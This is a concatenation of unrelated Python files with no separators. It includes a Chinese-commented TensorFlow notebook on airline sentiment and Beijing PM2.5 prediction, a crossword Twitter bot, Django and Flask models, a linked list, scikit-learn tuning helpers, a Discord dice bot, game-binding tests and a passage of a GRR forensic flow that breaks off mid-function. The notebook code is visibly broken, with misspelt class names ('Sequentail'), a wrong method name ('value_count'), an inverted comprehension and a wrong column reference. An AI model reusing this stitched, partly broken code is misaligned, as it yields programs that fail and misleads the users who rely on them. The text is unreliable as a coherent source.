and label data = data[['airline_sentiment','text']] print(data.airline_sentiment.unique()) #标签种类 print(data.airline_sentiment.value_count()) #样本分布 data_p = data[data.airline_sentiment=='positive'] data_n = data[data.airline_sentiment=='negative'] data_n = data_n.iloc[:data_p.shape[0]] data = pd.concat([data_p,data_n]) data = data.sample(len(data)) data['label'] = (data.airline_sentiment == 'positive').astype(int) del data['airline_sentiment'] # 文本清洗 def reg_text(text): token = re.compile('[A-Za-z]+|[!?,.()]') new_text = token.findall(text) new_text = [word.lower() for word in new_text] return new_text data['text'] = data['text'].apply(reg_text) # 文本转ID word_set = list(set([word for word in text for text in data['text'].tolist()])) word_index = {} for index, word in enumerate(word_set): word_index[word] = index + 1 #由于使用0进行填充,因此index从1开始 data_ok = data['text'].apply(lambda x: [word_index.get(word,0) for word in x]) # 文本长度分析 text_len = data_ok.apply(lambda x : len(x)) print(text_len.describe()) max_len = max(text_len) #40 max_word = len(word_set) + 1 #1为填充 data_ok = tf.keras.preprocessing.sequence.pad_sequences(data_ok.values, max_len) #填充0,使得长度为max_len # LSTM模型构建 model = tf.keras.models.Sequential() model.add(tf.keras.layers.Embedding(max_word, 50, input_length=max_len)) #向量化,input_length输入数据的长度, (None, max_len, 50) model.add(tf.keras.layers.LSTM(64)) #model.add(tf.keras.layers.Dense(128, activation='relu', kernel_regularizer=keras.regularizers.l2(0.01))) #添加L2正则化 model.add(tf.keras.layers.Dense(1, activation='sigmoid')) model.summary() model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.01), loss='binary_crossentropy', metrics=['acc']) model.fit(data_ok, data.labels.values, epochs=10, batch_size=32, validation_split=0.2) #选择20%作为测试集 #%% RNN - 北京空气污染预测 # 目标:预测未来的PM2.5水平 import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline import numpy as np import pandas as pd import re import datetime # 1)数据处理 data = 
pd.read_csv('./dataset/PRSA_data.csv') #label is PM2.5 # Nan数据处理 data['pm2.5'].isna().sum() #2067, 由于去掉PM2.5为空的序列会打乱数据的时序性,因此采取填充的方式 data = data.iloc[24:] #去掉前24个pm2.5为空的数据 data = data.fillna(method='ffill') #前向填充,使用前天的数据填充昨天的数据 # 时间列合并成一个索引值 data['tm'] = data.apply(lambda x: datetime.datetime(year=x['year'], month=x['month'], day=x['day'], hour=x['hour']), axis=1) data.drop(columns=['year','month','day','hour','No'], inplace=True) data = data.set_index('tm') # 非数字列处理 print(data.cbwd.unique()) data = data.join(pd.get_dummies(data.cbwd)) #cbwd列进行onehot编码后,与原dataframe进行拼接 del data.cbwd # 数据时序性采样 # 使用前面多久的时序数据,来预测接下来多久的数据? data['pm2.5'][-1000:].plot() # 最后1000次PM2.5观测情况 seq_length = 5 * 24 #使用当前点前5天的数据 delay = 24 #预测当前点后1天的数据,因此delay=24h data_ = [] for i in range(len(data) - seq_length - delay): data_.append(data.iloc[i: i + seq_length + delay]) #按时序依次采样6天的数据 data_ = np.array([df.values for df in data_]) #转化成numpy形式 print(data_.shape) #(43656,144,11),一共采样出43656条时序数据,每条时序包括144个时间点,每个时间点包含11个特征值 # 训练和测试数据生成 np.random.shuffle(data_) x = data_[:,:seq_length,:] #(43656,120,11) y = data_[:,-1,0] #(43656,),-1 => 取每条时序的最后一个时间点,0 => 最后一个时间点的pm2.5值 split_b = int(0.8 * data_.shape[0]) train_x = x[:split_b] train_y = y[:split_b] test_x = x[split_b:] test_y = y[split_b:] # 数据标准化 # 注意:a. 训练集需要单独进行标准化,不能使用全局数据的标准化结果 # b. 测试集也应该使用训练集的均值和标准差进行标准化 # c. 
预测值是否需要进行标准化呢?不需要 mean = train_x.mean(axis=0) #按列计算均值 std = train_x.std(axis=0) #按列计算标准差 train_x = (train_x - mean)/std test_x = (test_x - mean)/std # 2)构建全连接神经网络 BATCH_SIZE = 32 model = tf.keras.Sequentail() model.add(tf.keras.Flatten(input_shape=train_x.shape[1:])) model.add(tf.keras.Dense(32,activation='relu')) model.add(tf.keras.Dense(1)) #回归问题,无需激活函数 model.compile(optimizer='adam', loss='mse', metrics=['mae']) history = model.fit(train_x,train_y, epochs=50, steps_per_epoch=split_b//BATCH_SIZE, validation_data=(test_x,test_y), validation_steps=(data_.shape[0]-split_b)//BATCH_SIZE) plt.plot(history.epoch, history.history['mean_absolute_error'], 'r', label='train-loss') plt.plot(history.epoch, history.history['val_mean_absolute_error'], 'g', label='validation-loss') plt.legend() # 3)构建单层LSTM网络 model = tf.keras.Sequentail() model.add(tf.keras.layers.LSTM(units=32, input_shape=train_x.shape[1:], activation='tanh')) #默认return_sequences=False, 即只返回LSTM的output结果,而非state结果 model.add(tf.keras.Dense(1)) model.compile(optimizer='adam', loss='mse', metrics=['mae']) history = model.fit(train_x,train_y, epochs=150, steps_per_epoch=split_b//BATCH_SIZE, validation_data=(test_x,test_y), validation_steps=(data_.shape[0]-split_b)//BATCH_SIZE) plt.plot(history.epoch, history.history['mean_absolute_error'], 'r', label='train-loss') plt.plot(history.epoch, history.history['val_mean_absolute_error'], 'g', label='validation-loss') plt.legend() # 4)构建多层LSTM网络 model = tf.keras.Sequentail() model.add(tf.keras.layers.LSTM(units=32, input_shape=train_x.shape[1:], activation='tanh', return_sequences=True)) #返回LSTM的output和state结果 model.add(tf.keras.layers.LSTM(units=32, activation='tanh', return_sequences=True)) model.add(tf.keras.layers.LSTM(units=32, activation='tanh', return_sequences=False)) #最后一个LSTM,只使用output输出,用于连接Dense层 model.add(tf.keras.Dense(1)) # 添加回调函数,在训练过程中降低学习速率 #在连续3个epoch中val_loss没有降低,则降低LR为原来的0.1倍,但最小不超过0.00001 lr_reduce = 
tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.1, min_lr=0.00001) model.compile(optimizer='adam', loss='mse', metrics=['mae']) history = model.fit(train_x,train_y, epochs=200, steps_per_epoch=split_b//BATCH_SIZE, validation_data=(test_x,test_y), validation_steps=(data_.shape[0]-split_b)//BATCH_SIZE, callbacks=[lr_reduce]) plt.plot(history.epoch, history.history['mean_absolute_error'], 'r', label='train-loss') plt.plot(history.epoch, history.history['val_mean_absolute_error'], 'g', label='validation-loss') plt.legend()
import pickle
from collections import namedtuple, defaultdict
from random import choice

import requests
from bs4 import BeautifulSoup
import markovify
from twython import Twython

# A single cryptic clue: who set it, which puzzle it came from, its grid
# number, the raw text, the cleaned word list and the letter pattern eg. (3,4).
Clue = namedtuple('Clue', 'setter xword_id clue_number raw_clue words pattern')
Setter = namedtuple('Setter', 'name clues markov')

# Twitter API credentials -- placeholders, fill in before deploying.
credentials = {'app_key': 'your',
               'app_secret': 'details',
               'oauth_token': 'go',
               'oauth_token_secret': 'here'}

# Map Guardian setter names to their Twitter handles.
twitter_handles = {'Qaos': '@qaos_xword',
                   'Boatman': '@BoatmanCryptics',
                   'Hectence': '@Hectence',
                   'Navy': '@navy_clues',
                   'Paul': '@crosswordpaul',
                   'Tramp': '@Tramp_crossword',
                   'Enigmatist': '@enigmatistelgar'}


def get_crossword_id():
    """Return the id of the most recent Guardian cryptic crossword."""
    url = 'https://www.theguardian.com/crosswords/series/cryptic'
    p = requests.get(url)
    soup = BeautifulSoup(p.content, 'html.parser')
    return int(soup.find(class_='fc-item')['data-id'].split('/')[-1])


def scrape_clues(crossword_id):
    """Scrape every clue of the given crossword and return a list of Clue tuples."""
    base = 'https://www.theguardian.com/crosswords/cryptic/'
    p = requests.get(base + str(crossword_id))
    soup = BeautifulSoup(p.content, 'html.parser')
    setter = soup.find(class_='byline').find('a').text
    clues = soup.find(class_='crossword__clues')
    todays_clues = []
    for clue in clues.findAll('li'):
        clue_number, raw_clue = (c.text for c in clue.findAll('div'))
        *words, pattern = raw_clue.split()
        for i, word in enumerate(words):
            # Strip the punctuation
            words[i] = ''.join([char for char in word if char.isalpha() or char == '-'])
        words = [w for w in words if w and w != '-']
        todays_clues.append(Clue(setter, crossword_id, clue_number,
                                 raw_clue, words, pattern))
    return todays_clues


def make_tweet(setter, crossword_id, clue):
    """Compose the tweet advertising today's puzzle plus one teaser clue."""
    url = 'https://www.theguardian.com/crosswords/cryptic/' + str(crossword_id)
    if setter in twitter_handles.keys():
        setter = twitter_handles[setter]
    # Typo fix: 'crytpic' -> 'cryptic' in the tweeted text.
    openings = [f"Today's @guardian cryptic crossword set by {setter}. ",
                f"Thanks to {setter} for today's @guardian cryptic. ",
                f"{setter} sets the @guardian cryptic today. "]
    middles = [f"Try '{clue}' to get you going! ",
               f"Have a go at '{clue}' and see how you get on! ",
               f"One from the archives: '{clue}'. "]
    ends = [f"Check it out here: {url}",
            f"The whole crossword can be found here: {url}",
            f"Have a go at the whole puzzle here: {url}"]
    return choice(openings) + choice(middles) + choice(ends)


def main():
    with open('./clues.pickle', 'rb') as f:
        clues = pickle.load(f)
    crossword_id = get_crossword_id()
    if crossword_id in [clue.xword_id for clue in clues]:
        pass  # return # This crossword is already in the database
    todays_clues = scrape_clues(crossword_id)
    clues += todays_clues
    with open('./clues.pickle', 'wb') as f:
        pickle.dump(clues, f)  # Save the new clues just scraped
    setter = todays_clues[0].setter
    patterns = defaultdict(list)
    setters = defaultdict(list)
    for clue in clues:
        *words, pattern = clue.raw_clue.split()
        patterns[len(words)].append(pattern)  # For tacking on eg. (3,4)
        setters[clue.setter].append(' '.join(words))  # Every clue by a setter
    # Train a Markov model on this setter's own clues when we have enough of
    # them; otherwise fall back to a model over every setter's clues.  This
    # also guarantees `model` is always bound (the original could leave it
    # undefined for an unknown setter).
    if setter in setters and len(setters[setter]) > 500:
        model = markovify.NewlineText(setters[setter])
    else:
        model = markovify.NewlineText([text for name in setters
                                       for text in setters[name]])
    # Bug fix: make_short_sentence can return None when generation fails;
    # retry a few times and bail out rather than crash on concatenation.
    fake_clue = None
    for _ in range(10):
        fake_clue = model.make_short_sentence(50)
        if fake_clue:
            break
    if fake_clue is None:
        return
    fake_clue += ' ' + choice(patterns[len(fake_clue.split())])
    tweet = make_tweet(setter, crossword_id, fake_clue)
    print(tweet)
    api = Twython(**credentials)
    api.update_status(status=tweet)


if __name__ == '__main__':
    main()
from typing import *


class Solution:
    def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]:
        """Horizontally flip each row of the binary matrix, then invert
        every bit.  Mutates A in place and returns it (same list object).
        """
        for row in A:
            # Flipping and inverting are independent per element, so do
            # both in a single pass via slice assignment (keeps mutation
            # in place, as the original did).
            row[:] = [1 - bit for bit in reversed(row)]
        return A
# -*- encoding: utf-8 -*-
from django import forms
from .models import *
from django.contrib.auth import authenticate


class RegisterQuestionForm(forms.Form):
    """Form for a visitor to submit a new question (optionally with an image)."""

    # Bug fix: max_length must be an int, not a str -- Django's
    # MaxLengthValidator compares it numerically against the value length,
    # and a string there raises TypeError under Python 3.
    email = forms.EmailField(
        label='Su Email',
        max_length=50,
        required=True,
    )
    title = forms.CharField(
        label='Titulo',
        max_length=50,
        required=True)
    question = forms.CharField(
        label='Pregunta:',
        max_length=300,
        widget=forms.Textarea(attrs={'cols': 80, 'rows': 30}),
        required=False,
    )
    apelativo = forms.CharField(
        label='Apelativo',
        max_length=10,
        required=False)
    image = forms.ImageField(required=False)


class RegisterAnswerForm(forms.Form):
    """Form for replying to an existing question."""

    email = forms.EmailField(label='Su E-mail:',
                             max_length=70,
                             required=False,
                             )
    answer = forms.CharField(label='Su Respuesta',
                             max_length=300,
                             widget=forms.Textarea(attrs={'cols': 80, 'rows': 30}))
from flask_restful import reqparse
from db import db


class Patient_info(db.Model):
    """One health reading (blood glucose and blood pressure) for a patient."""

    __tablename__ = "Health_info"

    id = db.Column(db.Integer, primary_key=True)   # surrogate key
    patient_id = db.Column(db.Integer)             # id of the patient this reading belongs to
    Glucose = db.Column(db.Integer)                # blood glucose reading
    SBP = db.Column(db.Integer)                    # systolic blood pressure
    DBP = db.Column(db.Integer)                    # diastolic blood pressure
    time = db.Column(db.String)                    # timestamp of the reading, stored as a string

    def __init__(self, patient_id, Glucose, SBP, DBP, time):
        self.patient_id = patient_id
        self.Glucose = Glucose
        self.SBP = SBP
        self.DBP = DBP
        self.time = time

    # Request parser for incoming readings.  NOTE: defined at class level,
    # so it is a single parser shared by all instances of this model.
    health_info = reqparse.RequestParser()
    health_info.add_argument("Glucose", type=int, required=True,
                             help="Enter your latest blood glucose reading")
    # systolic pressure -- the pressure while the heart contracts
    health_info.add_argument("SBP", type=int, required=False)
    # diastolic pressure -- the pressure while the heart relaxes
    health_info.add_argument("DBP", type=int, required=False)

    def json(self):
        """Return this reading as a JSON-serializable dict."""
        return {"patient_id": self.patient_id, "Glucose": self.Glucose,
                "SBP": self.SBP, "DBP": self.DBP, "time": self.time}

    @classmethod
    def find_by_id(cls, patient_id):
        """Return every reading recorded for the given patient."""
        return cls.query.filter_by(patient_id=patient_id).all()

    @classmethod
    def last_entry(cls, patient_id):
        """Return the most recently inserted reading for the given patient."""
        return cls.query.filter_by(patient_id=patient_id).order_by(cls.id.desc()).first()

    def save_to_db(self):
        """Insert (or update) this reading and commit the session."""
        db.session.add(self)
        db.session.commit()

    def delete_from_db(self):
        """Delete this reading and commit the session."""
        db.session.delete(self)
        db.session.commit()
class LinkedNode():
    """A single node of a singly linked list."""

    def __init__(self, data):
        self.next = None
        self.data = data


class LinkedList():
    """A singly linked list supporting head/tail insertion, ordered
    insertion, removal of the first matching value, and (reverse) printing.

    Fixes over the original:
      * Python 3 ``print()`` calls (the original used Python 2 print
        statements, inconsistent with the rest of this source, which
        already uses f-strings).
      * ``remove`` no longer crashes on an empty list and removes only the
        FIRST occurrence (previously a value at both the head and the next
        node was removed twice).
      * ``InsertInOrder`` now inserts values smaller than the head BEFORE
        the head (previously they were spliced in after it).
    """

    def __init__(self):
        self.head = None

    def InsertAtHead(self, newHeadData):
        """Insert newHeadData at the front of the list."""
        newNode = LinkedNode(newHeadData)
        if self.head:
            newNode.next = self.head
        self.head = newNode

    def remove(self, removeData):
        """Remove the first node whose data equals removeData; no-op if absent."""
        curNode = self.head
        if curNode is None:          # empty list: nothing to remove
            return
        if curNode.data == removeData:
            self.head = self.head.next
            return                   # only the first occurrence is removed
        while curNode.next:
            if curNode.next.data == removeData:
                curNode.next = curNode.next.next
                break
            curNode = curNode.next

    def InsertAtTail(self, newTailData):
        """Append newTailData at the end of the list."""
        newNode = LinkedNode(newTailData)
        if self.head:
            curNode = self.head
            while curNode.next:
                curNode = curNode.next
            curNode.next = newNode
        else:
            self.head = newNode

    def printList(self):
        """Print each element on its own line, head to tail."""
        curNode = self.head
        while curNode:
            print(curNode.data)
            curNode = curNode.next

    def printListreverse(self):
        """Print the contents tail-to-head as a single Python list."""
        printStack = []
        curNode = self.head
        while curNode:
            # lists have no push(); insert at index 0 to reverse the order
            printStack.insert(0, curNode.data)
            curNode = curNode.next
        print(printStack)

    def InsertInOrder(self, newData):
        """Insert newData so an ascending-sorted list stays sorted."""
        newNode = LinkedNode(newData)
        # Empty list, or new value belongs before the current head.
        if self.head is None or newData < self.head.data:
            newNode.next = self.head
            self.head = newNode
            return
        curNode = self.head
        while curNode.next:
            if curNode.next.data > newNode.data:
                break
            curNode = curNode.next
        newNode.next = curNode.next
        curNode.next = newNode


if __name__ == "__main__":
    # Build 1 -> 2 -> 4 -> 6 -> 8 -> 10 in sorted order, then prune it.
    intolist = [2, 4, 8, 6, 10]
    linkedList = LinkedList()
    linkedList.head = LinkedNode(1)
    for i in intolist:
        linkedList.InsertInOrder(i)
    linkedList.remove(1)
    linkedList.remove(10)
    linkedList.remove(8)
    linkedList.remove(6)
    linkedList.printList()
    linkedList.printListreverse()
import random
import warnings

import numpy as np
from scipy import stats
from sklearn.cross_decomposition import PLSRegression
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import RandomizedSearchCV, validation_curve
from sklearn.svm import SVR

warnings.filterwarnings("ignore")


def rf(dspectra, Y, param, metric, cv=5):
    """Refine random-forest hyperparameters around a previous best ``param``.

    Runs a RandomizedSearchCV over a narrow grid centred on the supplied
    parameters and returns ``(best_score, best_params)``.  For
    'neg_mean_squared_error' the score is converted to an RMSE.
    """
    params = {'n_estimators': np.linspace(abs(param['n_estimators'] - 29),
                                          param['n_estimators'] + 50, 5, dtype=int),
              'min_samples_leaf': np.linspace(abs(param['min_samples_leaf'] - 0.04),
                                              param['min_samples_leaf'] + 0.05, 3),
              'min_samples_split': np.linspace(abs(param['min_samples_split'] - 0.04),
                                               param['min_samples_split'] + 0.05, 3)}
    # Bug fix: random.seed(1234) returns None, so the original call passed
    # random_state=None and the forest was NOT reproducible.  Pass the seed
    # value itself instead.
    gsc = RandomForestRegressor(n_jobs=-1,
                                bootstrap=True,
                                max_features=param['max_features'],
                                random_state=1234)
    random_cv = RandomizedSearchCV(gsc, param_distributions=params, scoring=metric,
                                   cv=cv, n_jobs=-1, iid=False)
    random_cv.fit(dspectra, Y)
    if metric == 'neg_mean_squared_error':
        score = np.sqrt(-random_cv.best_score_)  # convert neg-MSE to RMSE
    else:
        score = random_cv.best_score_
    cv_param = random_cv.best_params_
    cv_param['max_features'] = param['max_features']
    return score, cv_param


def rf_final_result(x_train, y_train, param):
    """Fit and return the final RandomForestRegressor using the tuned params."""
    # Same random.seed(...) bug fix as in rf() above.
    gsc = RandomForestRegressor(n_estimators=param['n_estimators'],
                                bootstrap=True,
                                min_samples_split=param['min_samples_split'],
                                min_samples_leaf=param['min_samples_leaf'],
                                max_features=param['max_features'],
                                n_jobs=-1,
                                random_state=1234)
    gsc.fit(x_train, y_train)
    return gsc


def svr(dspectra, Y, param, metric, cv=5):
    """Refine RBF-SVR hyperparameters around a previous best ``param``.

    C is searched within +/-20% (capped at 400) and gamma within +/-50%
    (capped at 0.008).  Returns ``(best_score, best_params)``; for
    'neg_mean_squared_error' the score is converted to an RMSE.
    """
    params = {'C': np.linspace(param['C'] * .8, min(param['C'] * 1.2, 400), 3),
              'gamma': np.linspace(param['gamma'] * 0.5, min(param['gamma'] * 1.5, 0.008), 3)}
    svr = SVR(kernel='rbf')
    random_cv = RandomizedSearchCV(svr, param_distributions=params, scoring=metric,
                                   cv=cv, n_jobs=-1, iid=False)
    random_cv.fit(dspectra, Y)
    if metric == 'neg_mean_squared_error':
        score = np.sqrt(-random_cv.best_score_)
    else:
        score = random_cv.best_score_
    return score, random_cv.best_params_


def svr_final_result(x_train, y_train, param):
    """Fit and return the final RBF-SVR using the (rounded) tuned params."""
    svr = SVR(kernel='rbf', C=round(param['C'], 3), gamma=round(param['gamma'], 5))
    svr.fit(x_train, y_train)
    return svr


def pls(dspectra, Y, ncomp, metric, cv=5):
    """Tune the PLS component count around ``ncomp`` with a validation curve.

    Searches n_components in [max(ncomp-3, 0), ncomp+3) and applies a
    one-standard-error rule: pick the smallest component count whose mean
    CV score is within one SEM of the best.  Returns
    ``[score_at_choice, chosen_n_components]``; for
    'neg_mean_squared_error' scores are converted to RMSE first.
    """
    maxComp = ncomp + 3
    minComp = max(ncomp - 3, 0)
    param_range = np.arange(minComp, maxComp, 1)
    train_scores, test_scores = validation_curve(
        PLSRegression(), dspectra, Y,
        param_name="n_components", param_range=param_range,
        scoring=metric, cv=cv, n_jobs=-1)
    test_scores_mean = np.mean(test_scores, axis=1)
    ses = stats.sem(test_scores, axis=1)
    ind = test_scores_mean.argmax()
    score = test_scores_mean[ind]
    # One-SE rule: first (smallest) component count within one SEM of best.
    diff = abs(test_scores_mean - score)
    arg_param = np.argmax(diff < ses[ind])
    if metric == 'neg_mean_squared_error':
        test_scores_mean = np.sqrt(-test_scores_mean)
    return [test_scores_mean[arg_param], param_range[arg_param]]


def pls_final_result(x_train, y_train, param):
    """Fit and return the final PLSRegression with ``param`` components."""
    pls = PLSRegression(param)
    pls.fit(x_train, y_train)
    return pls
from models.players import Player


class PlayerView():
    """Console view for prompting about and displaying players."""

    def ask_information(self, dataRequested):
        """Prompt the user to type the requested piece of data."""
        print('Please type the ' + dataRequested)

    def display(self, message):
        """Write a message to the console."""
        print(message)

    def display_players_name(self, players_to_display: list[Player]):
        """Print each player's name, numbered from 1."""
        # enumerate with start=1 avoids the manual index + 1 arithmetic.
        for position, member in enumerate(players_to_display, start=1):
            print(f'{position}: {member}')
''' coordinates are [u,v], points are [x,y,z] '''
import math, random
import util, tests

random.seed(0)  # deterministic runs for the test harness below


def sphere_eq(c):
    """Map a [u, v] coordinate to a point [x, y, z] on a unit sphere.

    u is the azimuthal angle; v/2 acts as the polar angle, so v is
    presumably expected in [0, 2*pi] -- TODO confirm intended range.
    """
    u,v = c
    x = math.cos(u)*math.sin(v/2)
    y = math.sin(u)*math.sin(v/2)
    z = -math.cos(v/2)
    return [x,y,z]


def klein_eq(c):
    """Map a [u, v] coordinate to a point [x, y, z] on a Klein-bottle-like
    surface: u runs along the curved spine, v around the tube cross-section.
    """
    u,v = c
    # todo - check bounds on u,v
    h = 15   # overall height of the figure
    w = 5    # horizontal excursion of the spine
    r1 = .5 #2
    r2 = 3 #5 #5
    # Tube radius oscillates between r1 and r2 along u.
    r = r1 + (r2-r1)*(math.sin(u+math.sin(u)/2)+1)/2
    # math.atan2(dzdu, dxdu), assuming r constant
    # Spine tangent direction, used to tilt the tube cross-section so it
    # stays perpendicular to the spine.
    dzdu = h*math.cos(u/2)/2
    dxdu = w*-math.cos((1-math.cos(u/2))*math.pi) * math.sin(u/2)*math.pi/2
    a = math.atan2(dzdu, dxdu)
    #print(u, a)
    # Spine point offset by the tube circle rotated by angle a in the x-z plane.
    x = w*-math.sin((1-math.cos(u/2))*math.pi) + r*math.sin(a)*math.cos(v)
    y = r*math.sin(v)
    z = h*math.sin(u/2) + r*-1*math.cos(a)*math.cos(v)
    return [x,y,z]


# Smoke-evaluate the spine (v = 0) at 50 samples of u; results are discarded.
for ui in range(0, 50):
    u = 2*math.pi*ui/50
    klein_eq([u, 0])

tests.test_eq(klein_eq, 10000)  # project test harness (util/tests modules)
# user.py import discord from discord.ext import commands import random class DnD(commands.Cog): def __init__(self, bot): self.bot = bot self._last_member = None # commands @commands.command() async def roll(self, ctx, n, x): """roll n x: Rolls n dice of x sides""" roll = 0 #i = 0 for i in range(int(n)): rolledNumber = random.randint(1, int(x)) roll = roll + rolledNumber await ctx.send(n + "d" + x + " rolled: " + str(roll)) @commands.command() async def mroll(self, ctx, x, y, z): """roll x y z: Rolls x dice of y sides and adds z to the total""" roll = 0 #i = 0 for i in range(int(x)): rolledNumber = random.randint(1, int(y)) roll = roll + rolledNumber roll = roll + int(z) await ctx.send(x + "d" + y + " rolled with modifier " + z + ": " + str(roll))
from Funciones import *


class Curso():
    """A course: holds its name plus the enrolled students and subjects."""

    def __init__(self, nombre):
        self.nombre = nombre
        self.alumnos = []
        self.materias = []

    def agregarAlumno(self, alumno):
        """
        :parametro alumno: object
        :return None
        """
        self.alumnos.append(alumno)

    def agregarMateria(self, materia):
        """
        :parametro materia: object
        :return None
        """
        self.materias.append(materia)

    def promedio(self):
        # :return float
        # Average of every enrolled student's overall average.
        notas = [alumno.promedioTotal() for alumno in self.alumnos]
        return calcularPromedio(notas)
from __future__ import annotations

from typing import Any, TYPE_CHECKING
from typing import Optional

from sqlalchemy.ext.asyncio import AsyncEngine

from virtool.data.transforms import AbstractTransform
from virtool.data.transforms import apply_transforms
from virtool.pg.utils import get_row_by_id
from virtool.types import Document
from virtool.uploads.models import SQLUpload
from virtool.users.db import AttachUserTransform
from virtool.utils import get_safely, base_processor

if TYPE_CHECKING:
    from virtool.mongo.core import Mongo


class ImportedFromTransform(AbstractTransform):
    """
    Attach the upload and upload user data to an imported reference.
    """

    def __init__(self, mongo: Mongo, pg: AsyncEngine):
        self._mongo = mongo
        self._pg = pg

    async def prepare_one(self, document: Document) -> Optional[Document]:
        # A reference that was not imported has no "imported_from" field;
        # in that case there is nothing to attach.
        try:
            upload_id = document["imported_from"]["id"]
        except KeyError:
            return None

        # NOTE(review): assumes the upload row exists — get_row_by_id could
        # return None for a dangling upload id; verify upstream guarantees.
        row = await get_row_by_id(self._pg, SQLUpload, upload_id)

        # Expand the upload row with the uploading user's details.
        return await apply_transforms(row.to_dict(), [AttachUserTransform(self._mongo)])

    async def attach_one(
        self, document: Document, prepared: Optional[Document]
    ) -> Document:
        # Leave the document untouched when there was no upload to attach.
        if prepared is None:
            return document

        return {**document, "imported_from": prepared}


# Reference fields included when attaching a reference to a document.
PROJECTION = ["_id", "name", "data_type"]


class AttachReferenceTransform(AbstractTransform):
    """Attach minimal reference details (id, name, data type) to a document."""

    def __init__(self, mongo: "Mongo"):
        self._mongo = mongo

    async def prepare_one(self, document: Document) -> Any:
        reference_id = get_safely(document, "reference", "id")

        if reference_id:
            # Fetch only the projected fields and normalize _id -> id.
            return base_processor(
                await self._mongo.references.find_one({"_id": reference_id}, PROJECTION)
            )

        raise ValueError("Missing reference id")

    async def attach_one(self, document: Document, prepared: Any) -> Document:
        return {**document, "reference": prepared}
""" Loading is tricky to test: a new Python process is needed each time because of global state in GameData. The hacky approach here is to run pytest in a subproces on just that one test. """ import pytest import subprocess import sys import platform import os import gc import endless_sky.bindings as m from helpers import icky_global_state, empty_resources_dir, empty_config_dir @icky_global_state def test_GameData_simple(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Canoe\n\tdescription "A boat."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); assert list(ships) == [("Canoe", ships.Get("Canoe"))] @icky_global_state def test_GameData_simple1(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Canoe\n\tdescription "A boat."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); assert list(ships) == [("Canoe", ships.Get("Canoe"))] @icky_global_state def test_GameData_simple2(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Kayak\n\tdescription "A sleeker boat for only one."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); assert list(ships) == [("Kayak", ships.Get("Kayak"))] @icky_global_state def test_GameData_ownership(empty_resources_dir, empty_config_dir): (empty_resources_dir / "data" / "simple.txt").write_text('ship Canoe\n\tdescription "A boat."') m.GameData.BeginLoad([ "progname", "--resources", str(empty_resources_dir), "--config", str(empty_config_dir), ]) ships = m.GameData.Ships(); canoe = ships.Get("Canoe") del canoe # segfault if Get used the default return value policy # This library does not ship with vanilla data, 
but it's always present in the # build enviroment so we might as well use it. @icky_global_state def test_GameData_full(empty_config_dir): m.GameData.BeginLoad([ "progname", "--resources", "./endless_sky/endless-sky", "--config", str(empty_config_dir), ]) # This might use a lot of memory (if sprites get loaded) assert len(m.GameData.Ships()) > 100 ships = m.GameData.Ships(); ships = dict(ships) s = ships['Shuttle'] del ships gc.collect() del s gc.collect() govts = m.GameData.Governments(); print(govts) govts = dict(govts) g = govts['Republic'] del govts gc.collect() del g gc.collect() outfits = m.GameData.Outfits(); outfits = dict(outfits) o = outfits['Hyperdrive'] del outfits gc.collect() del o gc.collect() planets = m.GameData.Planets(); planets = dict(planets) p = planets['Earth'] del planets gc.collect() del p gc.collect() systems = m.GameData.Systems(); systems = dict(systems) s = systems['Sol'] del systems gc.collect() del s gc.collect() # This used to segfault @icky_global_state def test_GameData_full(empty_config_dir): m.GameData.BeginLoad([ "progname", "--resources", "./endless_sky/endless-sky", "--config", str(empty_config_dir), ]) system = m.GameData.Systems()['Sol'] government = system.GetGovernment() del government humans = [] for planet_name, planet in m.GameData.Planets(): system = planet.GetSystem() if not system: continue system_name = system.Name() name = planet_name + ' ' + system_name if planet.GetSystem().GetGovernment().GetName() in ['Republic']: humans.append(name) assert len(humans) > 10
#!/usr/bin/env python """Flow that reads data low level.""" import logging from grr_response_core.lib.rdfvalues import read_low_level as rdf_read_low_level from grr_response_server import data_store from grr_response_server import file_store from grr_response_server import flow_base from grr_response_server import server_stubs from grr_response_server.databases import db from grr_response_server.rdfvalues import objects as rdf_objects # TODO: Consider allowing big files using external store. class ReadLowLevel(flow_base.FlowBase): """A low-level transfer mechanism for raw data from a device. This flow reads and collects `length` bytes from a given `path` starting at the provided `offset`. Returns to parent flow: A ReadLowLevelResult with information on the temporary file created with the raw data. """ category = "/Filesystem/" args_type = rdf_read_low_level.ReadLowLevelArgs def Start(self): """Schedules the read in the client (ReadLowLevel ClientAction).""" # TODO: Set `blob_size` according to `sector_block_size`. request = rdf_read_low_level.ReadLowLevelRequest( path=self.args.path, length=self.args.length, offset=self.args.offset) if self.args.HasField("sector_block_size"): request.sector_block_size = self.args.sector_block_size if not self.client_version or self.client_version >= 3459: self.CallClient( server_stubs.ReadLowLevel, request, next_state=self.StoreBlobsAsTmpFile.__name__) else: raise flow_base.FlowError("ReadLowLevel Flow is only supported on " "client version 3459 or higher (target client " f"version is {self.client_version}).") def StoreBlobsAsTmpFile(self, responses): """Stores bytes retrieved from client in the VFS tmp folder.""" if not responses.success: raise flow_base.FlowError(responses.status) file_size = 0 file_hash_from_client = None # Hash on the last buffer reference. 
